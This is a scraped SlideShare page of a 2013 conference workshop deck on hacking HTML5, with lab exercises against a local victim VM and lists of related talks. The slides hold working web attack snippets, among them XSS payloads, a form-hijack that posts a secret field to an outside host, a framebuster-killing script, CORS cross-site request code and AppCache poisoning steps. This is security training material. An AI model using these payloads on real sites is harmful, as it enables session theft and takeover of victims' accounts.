SlideShare a Scribd company logo

Krzysztof Kotowicz - Hacking HTML5

DefconRussia
DefconRussia
Technology
1 of 39
Download to read offline
http://10.10.0.1/ VirtualBox (~4 gb needed) No VirtualBox? Apache + PHP Chrome + Firefox unpack zeronights.zip host root dir as //localvictim and //127.0.0.1 shared folder - dir with upacked zeronights.zip login:ubuntu, pass: ? /evil dir as //evil Hacking HTML5 Krzysztof Kotowicz ZeroNights 2013
/whoami • I work at SecuRing and Cure53 • I do web security research • I present at cons (BlackHat, BRUCon, Hack In Paris, OWASP AppSec, CONFidence, ...) • @kkotowicz • blog.kotowicz.net Plan hacks = [ "Same Origin Policy — quirks, flavors & bypasses", "XSSing with HTML5 — twisted vectors & amazing exploits", "Exploiting Web Messaging", "Attacking with Cross Origin Resource Sharing", "Targeting Client side storage and Offline Cache Poisoning", "Using WebSockets for attacks", "Iframe sandboxing & clickjacking", "Bypassing Content Security Policy", "Webkit XSS Auditor & IE Anti-XSS filter — behind the scenes", ]
Plan def plan(): ! general_intro() ! known = [js, xss, http, ..] ! ! ! ! for h in hacks: ! known.append(h) ! intro(h, short=True) ! attack_with(known) Disclaimer • Workshops highly practical • Firebug & similar tools knowledge assumed • Medium-to-hard tasks • Limited time - try at home! • Ask questions please! • Of course - use all this for educational purposes & doing legitimate stuff
Lab setup • ubuntu:ubuntu • http://localvictim • http://evil • /home/ubuntu/Desktop/remote/ • evil/solutions Same Origin Policy quirks, flavors & bypasses
Same Origin Policy • • Security model for the web • Origin = scheme + host + port Restrict communication between applications from different origins http://example.com/document http://example.com/other/document/here https://example.com/document https://www.example.com/document http://example.com:8080/document  Same Origin Policy • Multiple same origin policies - cookies, DOM access, Flash, Java, XMLHttpRequest • Different rules for policies • Multiple quirks
SOP Bypass vs XSS • SOP bypass = read / write across origins • e.g. read DOM elements • set cookies • browser / specs bug • XSS - execute code on target origin • application bug SOP Quirks • Java applets • example.com === example.net $ host example.com example.com has address 93.184.216.119 $ host example.net example.net has address 93.184.216.119 • Shared hosting => SOP bypass
SOP Quirks matter • IE - port does not == http://example.com/ http://example.com:8080 • cookies: Any subdomain can set cookies to parent domains • microsoft.com must trust all *.microsoft.com sites SOP Quirks • cookie forcing - write arbitrary cookies • HTTPS • Set-Cookie: admin=false; secure • HTTP (man-in-the-middle) • Set-Cookie: admin=true; secure • Cookie: admin=true;
SOP side-channels • • • • • • window.name <iframe name="yup.anything!you()want"> window.open('a_name') setting location traversing iframes top.frames[1].frames[2].length top.frames[1].frames[2].location= iframe height, scrolling positions timing SVG filters - http://www.contextis.com/files/ Browser_Timing_Attacks.pdf Practice! • http://localvictim/01-sop/1/ • alert ‘secret’ value • http://localvictim/01-sop/2/ • detect if user is logged in or not (x-domain) • * http://localvictim/01-sop/1/index2.php • alert ‘secret’ value
XSSing with HTML5 twisted vectors & amazing exploits XSS in HTML5 <input|button autofocus> <math> <maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME <mtext>http://google.com</mtext> </maction> </math> <input oninput=alert(1) autofocus> <div style="height:30px;overflow:scroll" onscroll=alert(1)>.......</div>
XSS in HTML5 • Interesting form based vectors: <form id="f"> ... <button form=f formaction=//evil.me formtarget=...> <button form=f type=submit> • • • Send form to your server Change target window Change encoding XSS in HTML5 <form id=f action=https://benign.com> <input name=secret> </form> // anywhere in the document - notice no JS! <button form=f formaction=http://bad.ru>CLICK </button>
XSS in HTML5 • Data: URIs data:[<MIME-type>][;charset=<charset>][;base64],<data> <a href=”data:text/html, <script>alert(1)</script>”>XSS</a> <a href=”data:text/html;base64, PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”> btoa() • Evade filters XSS in HTML5 • HTML5 helps with the exploitation • WebSockets connection with C&C • Extract local DB, geolocation, HTML5 filesystem • • // stealth mode history.pushState('/innocent-url') // persistence localStorage['code']='alert(/delayed/)'; // months later eval(localStorage['code'])
Practice! • http://localvictim/02-xss/ • alert one • * send csrf token to //evil Exploiting Web Messaging
Web Messaging Web browsers, for security and privacy reasons, prevent documents in different domains from affecting each other; that is, cross-site scripting is disallowed. While this is an important security feature, it prevents pages from different domains from communicating even when those pages are not hostile. This section introduces a messaging system that allows documents to communicate with each other regardless of their source domain, in a way designed to not enable cross-site scripting attacks. http://www.w3.org/TR/webmessaging/ Web Messaging • ...designed not to enable XSS • http://html5demos.com/ postmessage2
Web Messaging • client-side window-to-window communication • no server, no TCP traffic! • cross domain by default Web Messaging <html> // my.domain <iframe src=//other.domain/widget></iframe> // sender var w = frameElement.contentWindow; var wOrigin = 'http://example.com'; // or "*" w.postMessage('hi!', wOrigin); // receiver window.addEventListener("message", function(e) { if (e.origin !== "http://example.com") { alert('Ignoring ' + e.origin); } else { alert(e.origin + " said: " + e.data); } }, false);
Web Messaging bugs // frame could get replaced, you're sending to attacker!!! frame.postMessage({secret:stuff}, "*"); window.addEventListener("message", function(e) { ! // no sender validation ! do_stuff_with(e.data); ! // are you kidding me?? ! div.innerHTML = e.data; } Practice! • http://localvictim/03-messaging/ • XSS the victim • * hijack the contents of an email when user enters it
Attacking with Cross Origin Resource Sharing CORS • Cross domain XHR, with credentials: • cookies • SSL/TLS client certificate • HTTP auth credentials • Target server decides to allow/forbid
Classic XHR • In domain only CORS • Cross-domain allowed
CORS • XHR request reaches the target server • With appropriate credentials • Can be abused for Cross Site Request Forgery CORS // http://attacker.cn var xhr = new XMLHttpRequest(); xhr.open("POST", "http://victim.ch"); xhr.setRequestHeader("Content-Type", "text/ plain"); xhr.withCredentials = "true"; // cookies etc. xhr.send("Anything");
CORS on the wire Simple request GET /data/ HTTP/1.1 Host: target.example Origin: http://src.example … HTTP/1.1 200 OK Date: Mon, 01 Dec 2008 00:23:53 GMT Server: Apache/2.0.61 Access-Control-Allow-Origin: http://src.example Content-Type: application/json {"secret-data":xxxxxx} CORS on the wire preflight OPTIONS /data/ HTTP/1.1 Host: target.example Origin: http://src.example Access-Control-Request-Method: POST Access-Control-Request-Headers: X-MyHeader … HTTP/1.1 200 OK Access-Control-Allow-Origin: http://src.example Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: X-MyHeader Access-Control-Max-Age: 1728000
CORS on the wire preflight POST /data/ HTTP/1.1 Host: target.example Origin: http://src.example Content-Type: text/xml; charset=UTF-8 Content-Length: xxx X-MyHeader: apikey=23423423 <?xml ..... … HTTP/1.1 200 OK Access-Control-Allow-Origin: http://src.example Content-Type: text/plain ok CORS - weaknesses • Again, wildcards: • Access-Control-Allow-Origin: * = everybody can read me • A-C-A-O: <sender-origin> is even worse • You can use CORS to send arbitrary blind requests (CSRF) • What if receiver is malicious?
Silent file upload Content-Type: multipart/form-data; boundary=AaB03x --AaB03x Content-Disposition: form-data; name="submit-name" Larry --AaB03x Content-Disposition: form-data; name="files"; filename="file1.txt" Content-Type: text/plain ... contents of file1.txt ... --AaB03x-- x end hr.s ("A ing nyth Silent file upload xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary=xxx"); xhr.send(' --xxxrn Content-Disposition: form-data; name="files"; filename="file1.txt"rn Content-Type: text/plainrn rn ANYTHINGrn --xxx--'); ");
Silent file upload • Simulates multipart/form-data request with <input type=file> upload • Already used to: • Replace firmware in routers • Take control of application servers logUrl = 'http://glassfishserver/ management/domain/applications/ application'; fileUpload(c,"maliciousarchive.war"); Content injection • http://website/#/a/page xhr.open("GET", "/a/page"); • https://touch.facebook.com/#http:// example.com/xss.php HTTP/1.1 200 OK Access-Control-Allow-Origin: * Content-Type: text/html <img src=x onerror=alert(1)>
Practice! • http://localvictim/04-cors/ • XSS the victim and alert his user ID Targeting Client side storage & Offline Cache Poisoning
AppCache • HTML pages can specify a manifest URL <html manifest=/cache.manifest> • Manifest • text/cache-manifest MIME type • Lists URLs that should be fetched and stored Man in the middle • Eavesdrop / modify traffic • XSS • session hijack (Firesheep) • Doesn’t last long
AppCache poison 1. During MITM: inject poison <html manifest="/robots.txt"> ....<script>evil_foo()</script> 2. After MITM: • • • CACHE MANIFEST CACHE: http://victim/ NETWORK: * robots.txt has invalid MIME type poisoned page fetched from cache code runs until offline cache is purged Demo! • http://localvictim/05-offline/ • perform offline attack with sslstrip • google-chrome --proxy-server=http://evil:10000 • payload: alert login & password
Using WebSockets for attacks WebSockets • 2-way TCP connection from browser to server • bandwidth efficient • asynchronous - no request / response model • available to JS
WebSockets • Handshake similar to HTTP • Optionally encrypted with TLS (wss://) • Dumb protocol • No user authorization • No user authentication WebSockets if (window.WebSocket) { var url = 'ws://host:port/path' ,s = new WebSocket(url); s.onopen = function(e) {}; s.onclose = function(e) {}; s.onmessage = function(e) { // e.data - server sent data }; s.send('hello server!'); }
WebSockets security • • • Attack app-level protocols • look for DoS, auth flaws Sometimes plain TCP services are tunneled over WebSockets You can attack servers with: • • • browser - xss browser - third party website custom client Demo! • cd /home/ubuntu/Desktop/remote/06websockets/websockify-master • ./run.sh • http://localvictim/06-websockets/ • login into ws://localvictim:9999 user ‘admin’ • * extract flag from admin home dir
Iframe sandboxing & clickjacking Clickjacking • You all know it. • Don’t get framed • Lots of websites use: if (self !== top) { ! top.location = self.location; }
Clickjacking - bypass // evil framing victim wanting to jump out of frame var kill_bust = 0 window.onbeforeunload = function(){kill_bust++}; setInterval(function() { if (kill_bust > 0) { kill_bust -= 2; top.location = '204.php'; }}, 1); // basically, a race condition on top reload Clickjacking w/ HTML5 • IFRAME sandbox restricts what a frame can do <iframe src="http://victim.com" sandbox=" allow-forms allow-scripts" /> • no allow-top-navigation => top.location.href = .... fails
Practice! • http://localvictim/07-clickjacking/ • clickjack “Delete my account” button Bypassing Content Security Policy
CSP • whitelist content on your website with HTTP headers e.g. • Mitigate XSS by forbidding inline scripting • Only allow images from your CDN • Only allow XHR to your API server CSP Content-Security-Policy: default-src: 'none'; style-src: https://my.cdn.net; script-src: 'self' https://ssl.google-analytics.com; img-src: 'self' https://images.cdn.net; report-uri: https://my.com/violations
CSP • It’s XSS mitigation, XSS is still possible via obscure vectors • <iframe src=”filesystem://...> • Chrome Extensions • JSONP CSP • You can do much even without XSS • http://lcamtuf.coredump.cx/postxss/ • content extraction - unclosed elements: <img src=’..........<something>......’<else> • other - http://ruxcon.org.au/assets/slides/ CSP-kuza55.pptx
CSP • Still fresh concept & rapid development • Fresh scary bugs • https://bugzilla.mozilla.org/show_bug.cgi? id=886164 • Practice! • http://localvictim/08-csp/1.php • send CSRF token to //evil • * http://localvictim/08-csp/2.php • XSS (Firefox). If in Chrome, contact me ;)
Browser XSS filters behind the scenes Browser XSS filters • Detect dangerous patterns in HTTP request parameters (GET/POST) • Observe for reflection in HTTP response • Neutralize injection or block entire page • X-Xss-Protection: 0|1
Browser XSS filters Browser XSS filters IE8 <[i]?f{r}ame.*?[ /+t]*?src[ /+t]* (j|(&[#()=]x?0*((74)|(4A)|(106)|(6A));?))([t]|(&[#()=]x?0*(9|(13)|(10)|A| D);?))*(a|(&[#()=]x?0*((65)|(41)|(97)|(61));?))([t]|(&[#()=]x?0*(9|(13)|( 10)|A|D);?))*(v|(&[#()=]x?0*((86)|(56)|(118)|(76));?))([t]|(&[#()=]x?0*(9 |(13)|(10)|A|D);?))*(a|(&[#()=]x?0*((65)|(41)|(97)|(61));?))([t]|(&[#()=] x?0*(9|(13)|(10)|A|D);?))*(s|(&[#()=]x?0*((83)|(53)|(115)|(73));?))([t]|( &[#()=]x?0*(9|(13)|(10)|A|D);?))*(c|(&[#()=]x?0*((67)|(43)|(99)|(63));?))( [t]|(&[#()=]x?0*(9|(13)|(10)|A|D);?))*{(r|(&[#()=]x?0*((82)|(52)|(114)|(7 2));?))}([t]|(&[#()=]x?0*(9|(13)|(10)|A|D);?))*(i|(&[#()=]x?0*((73)|(49)| (105)|(69));?))([t]|(&[#()=]x?0*(9|(13)|(10)|A|D);?))*(p|(&[#()=]x?0*((80 )|(50)|(112)|(70));?))([t]|(&[#()=]x?0*(9|(13)|(10)|A|D);?))*(t|(&[#()=]x ?0*((84)|(54)|(116)|(74));?))([t]|(&[#()=]x?0*(9|(13)|(10)|A|D);?))*(:|(& [#()=]x?0*((58)|(3A));?)).
Browser XSS filters Chrome • complex rules, discovers different contexts, tries to decode etc. • http://src.chromium.org/viewvc/blink/trunk/ Source/core/html/parser/XSSAuditor.cpp? revision=HEAD&view=markup • Bypasses every other month Browser XSS filters tricks • Use to disable benign scripts (e.g. framebusters) • Only GET / POST matched => use cookies • Multiple param injections = you always win
Browser XSS filters ASP.NET tricks • http://soroush.secproject.com/blog/ 2012/06/browsers-anti-xss-methods-in-aspclassic-have-been-defeated/ • concatenation: input1=a&input1=b => a,b • truncation:anything after %00 ignored • transliteration: %u0117 => ė => e Practice! • http://localvictim/09-antixss/1.php • * http://localvictim/09-antixss/irl.php • * http://www.sdl.me/xssdemo/getxss.asp • XSS’em all (Chrome)!
That is all. thx. q&a? Liked that? //blog.kotowicz.net

Recommended

Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Krzysztof Kotowicz
 
Evolution Of The Web Platform & Browser Security
Evolution Of The Web Platform & Browser SecurityEvolution Of The Web Platform & Browser Security
Evolution Of The Web Platform & Browser SecuritySanjeev Verma, PhD
 
Building Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 FeaturesBuilding Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 FeaturesConviso Application Security
 
Html5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPraHtml5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPraKrzysztof Kotowicz
 
Advanced Chrome extension exploitation
Advanced Chrome extension exploitationAdvanced Chrome extension exploitation
Advanced Chrome extension exploitationKrzysztof Kotowicz
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Jeremiah Grossman
 
Browser Security
Browser SecurityBrowser Security
Browser SecurityRoberto Suggi Liverani
 
Something wicked this way comes - CONFidence
Something wicked this way comes - CONFidenceSomething wicked this way comes - CONFidence
Something wicked this way comes - CONFidenceKrzysztof Kotowicz
 

Recommended

Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Krzysztof Kotowicz
 
Evolution Of The Web Platform & Browser Security
Evolution Of The Web Platform & Browser SecurityEvolution Of The Web Platform & Browser Security
Evolution Of The Web Platform & Browser SecuritySanjeev Verma, PhD
 
Building Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 FeaturesBuilding Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 FeaturesConviso Application Security
 
Html5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPraHtml5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPraKrzysztof Kotowicz
 
Advanced Chrome extension exploitation
Advanced Chrome extension exploitationAdvanced Chrome extension exploitation
Advanced Chrome extension exploitationKrzysztof Kotowicz
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Jeremiah Grossman
 
Browser Security
Browser SecurityBrowser Security
Browser SecurityRoberto Suggi Liverani
 
Something wicked this way comes - CONFidence
Something wicked this way comes - CONFidenceSomething wicked this way comes - CONFidence
Something wicked this way comes - CONFidenceKrzysztof Kotowicz
 
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download DetectionDrivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download DetectionWayne Huang
 
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.Krzysztof Kotowicz
 
MITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveMITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveGreenD0g
 
When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesWhen you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesMichele Orru
 
2010: A Web Hacking Odyssey - Top Ten Hacks of the Year
2010: A Web Hacking Odyssey - Top Ten Hacks of the Year2010: A Web Hacking Odyssey - Top Ten Hacks of the Year
2010: A Web Hacking Odyssey - Top Ten Hacks of the YearJeremiah Grossman
 
Web Security - Cookies, Domains and CORS
Web Security - Cookies, Domains and CORSWeb Security - Cookies, Domains and CORS
Web Security - Cookies, Domains and CORSPerfectial, LLC
 
CORS and (in)security
CORS and (in)securityCORS and (in)security
CORS and (in)securityn|u - The Open Security Community
 
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEFMichele Orru
 
Cors kung fu
Cors kung fuCors kung fu
Cors kung fuAditya Balapure
 
Buried by time, dust and BeEF
Buried by time, dust and BeEFBuried by time, dust and BeEF
Buried by time, dust and BeEFMichele Orru
 
List of useful security related http headers
List of useful security related http headersList of useful security related http headers
List of useful security related http headers한익 주
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
ZeroNights2012_BeEF_Workshop_antisnatchor
ZeroNights2012_BeEF_Workshop_antisnatchorZeroNights2012_BeEF_Workshop_antisnatchor
ZeroNights2012_BeEF_Workshop_antisnatchorMichele Orru
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakSoroush Dalili
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesAbraham Aranguren
 
DNS Rebinding Attack
DNS Rebinding AttackDNS Rebinding Attack
DNS Rebinding AttackFelipe Japm
 
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...Michele Orru
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
 
Pushing the web — WebSockets
Pushing the web — WebSocketsPushing the web — WebSockets
Pushing the web — WebSocketsRoland M
 
Misconfigured CORS, Why being secure isn't getting easier. AppSec USA 2016
Misconfigured CORS, Why being secure isn't getting easier. AppSec USA 2016Misconfigured CORS, Why being secure isn't getting easier. AppSec USA 2016
Misconfigured CORS, Why being secure isn't getting easier. AppSec USA 2016Evan J Johnson (Not a CISSP)
 
World Wealth Report 2007
World Wealth Report 2007World Wealth Report 2007
World Wealth Report 2007Wealth Partners
 
La sangre
La sangreLa sangre
La sangretallerempleomf
 

More Related Content

What's hot

Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download DetectionDrivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download DetectionWayne Huang
 
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.Krzysztof Kotowicz
 
MITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveMITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveGreenD0g
 
When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesWhen you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesMichele Orru
 
2010: A Web Hacking Odyssey - Top Ten Hacks of the Year
2010: A Web Hacking Odyssey - Top Ten Hacks of the Year2010: A Web Hacking Odyssey - Top Ten Hacks of the Year
2010: A Web Hacking Odyssey - Top Ten Hacks of the YearJeremiah Grossman
 
Web Security - Cookies, Domains and CORS
Web Security - Cookies, Domains and CORSWeb Security - Cookies, Domains and CORS
Web Security - Cookies, Domains and CORSPerfectial, LLC
 
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEFMichele Orru
 
Buried by time, dust and BeEF
Buried by time, dust and BeEFBuried by time, dust and BeEF
Buried by time, dust and BeEFMichele Orru
 
List of useful security related http headers
List of useful security related http headersList of useful security related http headers
List of useful security related http headers한익 주
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
ZeroNights2012_BeEF_Workshop_antisnatchor
ZeroNights2012_BeEF_Workshop_antisnatchorZeroNights2012_BeEF_Workshop_antisnatchor
ZeroNights2012_BeEF_Workshop_antisnatchorMichele Orru
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakSoroush Dalili
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesAbraham Aranguren
 
DNS Rebinding Attack
DNS Rebinding AttackDNS Rebinding Attack
DNS Rebinding AttackFelipe Japm
 
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...Michele Orru
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
 
Pushing the web — WebSockets
Pushing the web — WebSocketsPushing the web — WebSockets
Pushing the web — WebSocketsRoland M
 
Misconfigured CORS, Why being secure isn't getting easier. AppSec USA 2016
Misconfigured CORS, Why being secure isn't getting easier. AppSec USA 2016Misconfigured CORS, Why being secure isn't getting easier. AppSec USA 2016
Misconfigured CORS, Why being secure isn't getting easier. AppSec USA 2016Evan J Johnson (Not a CISSP)
 

What's hot (20)

Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download DetectionDrivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
 
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
 
MITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveMITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another Perspective
 
When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesWhen you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the masses
 
2010: A Web Hacking Odyssey - Top Ten Hacks of the Year
2010: A Web Hacking Odyssey - Top Ten Hacks of the Year2010: A Web Hacking Odyssey - Top Ten Hacks of the Year
2010: A Web Hacking Odyssey - Top Ten Hacks of the Year
 
Web Security - Cookies, Domains and CORS
Web Security - Cookies, Domains and CORSWeb Security - Cookies, Domains and CORS
Web Security - Cookies, Domains and CORS
 
CORS and (in)security
CORS and (in)securityCORS and (in)security
CORS and (in)security
 
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
 
Cors kung fu
Cors kung fuCors kung fu
Cors kung fu
 
Buried by time, dust and BeEF
Buried by time, dust and BeEFBuried by time, dust and BeEF
Buried by time, dust and BeEF
 
List of useful security related http headers
List of useful security related http headersList of useful security related http headers
List of useful security related http headers
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
 
ZeroNights2012_BeEF_Workshop_antisnatchor
ZeroNights2012_BeEF_Workshop_antisnatchorZeroNights2012_BeEF_Workshop_antisnatchor
ZeroNights2012_BeEF_Workshop_antisnatchor
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility Cloak
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
 
DNS Rebinding Attack
DNS Rebinding AttackDNS Rebinding Attack
DNS Rebinding Attack
 
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
 
Pushing the web — WebSockets
Pushing the web — WebSocketsPushing the web — WebSockets
Pushing the web — WebSockets
 
Misconfigured CORS, Why being secure isn't getting easier. AppSec USA 2016
Misconfigured CORS, Why being secure isn't getting easier. AppSec USA 2016Misconfigured CORS, Why being secure isn't getting easier. AppSec USA 2016
Misconfigured CORS, Why being secure isn't getting easier. AppSec USA 2016
 

Viewers also liked

World Wealth Report 2007
World Wealth Report 2007World Wealth Report 2007
World Wealth Report 2007Wealth Partners
 
Essay writing for Bschool selection
Essay writing for Bschool selectionEssay writing for Bschool selection
Essay writing for Bschool selectionRahul Reddy
 
Plan def. univ. beta panamá
Plan def. univ. beta panamáPlan def. univ. beta panamá
Plan def. univ. beta panamáArmandoMarino
 
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013midnite_runr
 
World Wealth Report 2013
World Wealth Report 2013World Wealth Report 2013
World Wealth Report 2013Wealth Partners
 
샤또 바티스트 고급 요양원
샤또 바티스트 고급 요양원샤또 바티스트 고급 요양원
샤또 바티스트 고급 요양원Wealth Partners
 
Firstov attacking mongo db
Firstov attacking mongo dbFirstov attacking mongo db
Firstov attacking mongo dbDefconRussia
 

Viewers also liked (9)

World Wealth Report 2007
World Wealth Report 2007World Wealth Report 2007
World Wealth Report 2007
 
La sangre
La sangreLa sangre
La sangre
 
Essay writing for Bschool selection
Essay writing for Bschool selectionEssay writing for Bschool selection
Essay writing for Bschool selection
 
Plan def. univ. beta panamá
Plan def. univ. beta panamáPlan def. univ. beta panamá
Plan def. univ. beta panamá
 
Pueblo West LP
Pueblo West LPPueblo West LP
Pueblo West LP
 
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
 
World Wealth Report 2013
World Wealth Report 2013World Wealth Report 2013
World Wealth Report 2013
 
샤또 바티스트 고급 요양원
샤또 바티스트 고급 요양원샤또 바티스트 고급 요양원
샤또 바티스트 고급 요양원
 
Firstov attacking mongo db
Firstov attacking mongo dbFirstov attacking mongo db
Firstov attacking mongo db
 

Similar to Krzysztof Kotowicz - Hacking HTML5

Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)Krzysztof Kotowicz
 
Html5 security
Html5 securityHtml5 security
Html5 securityKrishna T
 
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)Ivo Andreev
 
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Divyanshu
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeJeremiah Grossman
 
Browser Internals-Same Origin Policy
